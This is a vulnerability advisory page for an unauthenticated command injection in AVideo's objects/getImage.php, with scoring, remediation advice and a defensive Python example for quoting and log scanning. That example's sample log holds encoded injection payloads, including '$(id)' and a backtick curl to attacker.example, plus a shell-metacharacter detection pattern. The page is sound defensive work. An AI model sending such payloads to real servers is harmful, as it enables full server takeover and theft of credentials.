Description
AVideo is a video-sharing Platform software. Prior to version 7.0, an unauthenticated attacker can execute arbitrary OS commands on the server by injecting shell command substitution into the base64Url GET parameter. This can lead to full server compromise, data exfiltration (e.g., configuration secrets, internal keys, credentials), and service disruption. This issue has been patched in version 7.0.
Published: 2026-03-06
Score: 9.8 Critical
EPSS: 50.9% High
KEV: No
Impact: Remote Command Execution
Action: Patch Immediately
AI Analysis

Impact

The vulnerability allows an unauthenticated attacker to supply a crafted base64Url value in a GET request to objects/getImage.php. The application decodes the value and interpolates it into an OS command string without escaping it, so shell command substitution (for example $(...) or backticks) embedded in the decoded value is executed by the shell with the privileges of the web server process. The impact is severe: full server control, exfiltration of configuration data and credentials, and service disruption. The weakness is a classic OS command injection (CWE-78).

Affected Systems

Affected systems are WWBN installations of any version prior to 7.0. Note the product naming on this page: the CVE description and the GHSA advisory name the product AVideo (a video-sharing platform), while the NVD CPE recorded in the history below is cpe:2.3:a:wwbn:avideo-encoder with no version bounds. In either case the vulnerable code is the objects/getImage.php endpoint in every pre-7.0 release. No specific sub-versions are listed, so treat the entire pre-7.0 release line as vulnerable.

Risk and Exploitability

The CVSS 3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) indicates critical severity, and the EPSS score of 50.9%, the estimated probability of exploitation activity in the wild within the next 30 days, is high. Because the issue is unauthenticated and triggered by a single ordinary HTTP GET, an attacker needs only network reachability to the endpoint. The vulnerability is not listed in the CISA KEV catalog, and the SSVC assessment recorded in the history below rates it Automatable: yes, Technical Impact: total, with Exploitation: none observed at the time of assessment; the risk profile nevertheless warrants immediate action. Exploitation consists of constructing a base64url-encoded value that decodes to a string containing shell command substitution (for example $(...) or backticks); because the application interpolates the decoded value into a command without validating or escaping it, the injected command runs with the permissions of the web server process.

Generated by OpenCVE AI on April 16, 2026 at 11:27 UTC.

Remediation

The vendor remediation field on this page is empty, but the CVE description and the GHSA advisory both state that the issue is fixed in version 7.0; no vendor-published workaround for earlier versions is recorded here.

OpenCVE Recommended Actions

  • Apply the official fix by upgrading to version 7.0 or later (the release the CVE description and GHSA advisory name as patched), which removes the vulnerable code path.
  • If the deployment carries local modifications to objects/getImage.php, re-apply them on top of 7.0 rather than back-porting the fix by hand. The decoded base64Url value must never be interpolated into a shell command string: pass it as a discrete argument (escapeshellarg() in PHP), validate the decoded value against the format the endpoint expects, or remove the endpoint entirely so the bug cannot be re-introduced.
  • Until the upgrade is deployed, add a reverse-proxy or application-firewall rule for requests to objects/getImage.php. Blocking the base64Url parameter outright is the simplest rule but also breaks legitimate image requests that use it; a narrower rule base64url-decodes the value and rejects requests whose raw or decoded form contains shell metacharacters ($(, backtick, ;, |, &, newline). Either way, log the blocked requests: they are indicators of exploitation attempts worth following up.

Generated by OpenCVE AI on April 16, 2026 at 11:27 UTC.
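The two points made above, the decode-then-interpolate mechanism from the Impact paragraph and the pre-patch proxy rule from the recommended actions, as an added Python example. This is illustrative code written for this page, not AVideo's objects/getImage.php: the page does not show the project's code, so the command name (convert), the shape of a legitimate value (a URL), the parameter handling and the sample log lines are all assumptions. It decodes a base64url value, shows how unescaped interpolation leaves $(id) for the shell while shlex.quote keeps it a literal argument, implements a reject rule usable from a reverse-proxy or WAF hook, and runs that rule over constructed access-log lines to find attempts:

```python
"""Added example for the CVE-2026-29058 page; not AVideo's own code.

Assumptions (not taken from objects/getImage.php, which the page does not
show): the parameter is base64url text that is interpolated into a shell
command line, the command is "convert", and a legitimate value is a URL.
"""
import base64
import binascii
import re
import shlex
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/objects/getImage.php"   # endpoint named in the advisory
PARAM = "base64Url"                  # parameter named in the advisory

# Shell syntax that turns one interpolated argument into extra commands.
# $( ) and backticks are the command substitution the advisory describes;
# the rest are other ways of breaking out of a single argument.
SHELL_META = re.compile(r"\$\(|`|\$\{|[;&|<>\n\r]")


def decode_base64url(value: str) -> str:
    """Decode padded or unpadded base64url (RFC 4648 section 5) to text."""
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.urlsafe_b64decode(padded)
    except (binascii.Error, ValueError) as exc:
        raise ValueError(f"not base64url: {value!r}") from exc
    return raw.decode("utf-8", errors="replace")


def build_command_unsafe(decoded: str) -> str:
    """Hypothetical vulnerable pattern: the decoded value is pasted into a
    shell command string, so $(...) inside it is run by the shell."""
    return f"convert {decoded} -resize 320x240 /tmp/thumb.jpg"


def build_command_safe(decoded: str) -> str:
    """Same command with the value quoted as one shell word; passing it as
    an argv element to a process spawned without a shell is better still."""
    return f"convert {shlex.quote(decoded)} -resize 320x240 /tmp/thumb.jpg"


def is_injection_attempt(raw_param: str) -> bool:
    """Pre-patch reverse-proxy rule: reject a value whose raw or decoded
    form carries shell metacharacters; undecodable input is rejected too.
    The raw form is checked because urlsafe_b64decode silently discards
    characters outside the base64 alphabet."""
    if SHELL_META.search(raw_param):
        return True
    try:
        decoded = decode_base64url(raw_param)
    except ValueError:
        return True
    return SHELL_META.search(decoded) is not None


# Combined log format prefix: client, ident, user, [time], "METHOD target ..."
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*"')


def scan_access_log(lines):
    """Return (client_ip, decoded_payload) for requests to the vulnerable
    endpoint whose base64Url value looks like a command injection attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, target = m.groups()
        parts = urlsplit(target)
        if parts.path != ENDPOINT:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            if is_injection_attempt(value):
                try:
                    decoded = decode_base64url(value)
                except ValueError:
                    decoded = value
                hits.append((ip, decoded))
    return hits


def b64url(text: str) -> str:
    """Unpadded base64url encoding, used here only to build the sample log."""
    return base64.urlsafe_b64encode(text.encode()).rstrip(b"=").decode()


# Constructed sample log lines (not real traffic): the first and third carry
# encoded shell substitution, the second a benign URL, the fourth is unrelated.
SAMPLE_LOG = [
    f'203.0.113.5 - - [06/Mar/2026:10:00:01 +0000] "GET {ENDPOINT}?{PARAM}={b64url("$(id)")} HTTP/1.1" 200 512',
    f'198.51.100.7 - - [06/Mar/2026:10:00:02 +0000] "GET {ENDPOINT}?{PARAM}={b64url("https://example.com/a.jpg")} HTTP/1.1" 200 4096',
    f'203.0.113.5 - - [06/Mar/2026:10:00:03 +0000] "GET {ENDPOINT}?{PARAM}={b64url("x`curl attacker.example`")} HTTP/1.1" 500 0',
    '192.0.2.9 - - [06/Mar/2026:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    payload = decode_base64url(b64url("$(id)"))
    print(build_command_unsafe(payload))   # the shell would run id here
    print(build_command_safe(payload))     # value stays a literal argument
    for ip, hit in scan_access_log(SAMPLE_LOG):
        print(f"{ip} sent {hit!r}")
```

Run it directly to print the unsafe and quoted command lines and the two log hits. The reject rule checks the raw parameter as well as the decoded text because Python's urlsafe_b64decode drops characters outside the base64 alphabet before decoding, so a $( sent unencoded would otherwise vanish before the check; a PHP base64_decode() in non-strict mode behaves the same way. The quoting shown in build_command_safe is the minimal fix; the real fix in any language is to stop going through a shell and hand the value to the program as a single argv element after validating it against the format the endpoint expects.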


Advisories
Source: GitHub GHSA
ID: GHSA-9j26-99jh-v26q
Title: WWBN AVideo is vulnerable to unauthenticated OS Command Injection via base64Url in objects/getImage.php
History

Tue, 10 Mar 2026 19:15:00 +0000

CPEs added: cpe:2.3:a:wwbn:avideo-encoder:*:*:*:*:*:*:*:*

Mon, 09 Mar 2026 20:15:00 +0000

Metrics added: ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 06 Mar 2026 15:30:00 +0000

First time appeared: Wwbn; Wwbn avideo-encoder
Vendors & Products added: Wwbn; Wwbn avideo-encoder

Fri, 06 Mar 2026 07:15:00 +0000

Description added: AVideo is a video-sharing Platform software. Prior to version 7.0, an unauthenticated attacker can execute arbitrary OS commands on the server by injecting shell command substitution into the base64Url GET parameter. This can lead to full server compromise, data exfiltration (e.g., configuration secrets, internal keys, credentials), and service disruption. This issue has been patched in version 7.0.
Title added: AVideo: Unauthenticated OS Command Injection via base64Url in objects/getImage.php
Weaknesses added: CWE-78
References added: (none recorded on this page)
Metrics added: cvssV3_1 {'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}

MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-09T20:01:00.580Z

Reserved: 2026-03-03T17:50:11.244Z

Link: CVE-2026-29058

Vulnrichment

Updated: 2026-03-09T20:00:56.305Z

NVD

Status : Analyzed

Published: 2026-03-06T07:16:02.267

Modified: 2026-03-10T19:14:24.553

Link: CVE-2026-29058

Red Hat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T11:30:15Z

Weaknesses